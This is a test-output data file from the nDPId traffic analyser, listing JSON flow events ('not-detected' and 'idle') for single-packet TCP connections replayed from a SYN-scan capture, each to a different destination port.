-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 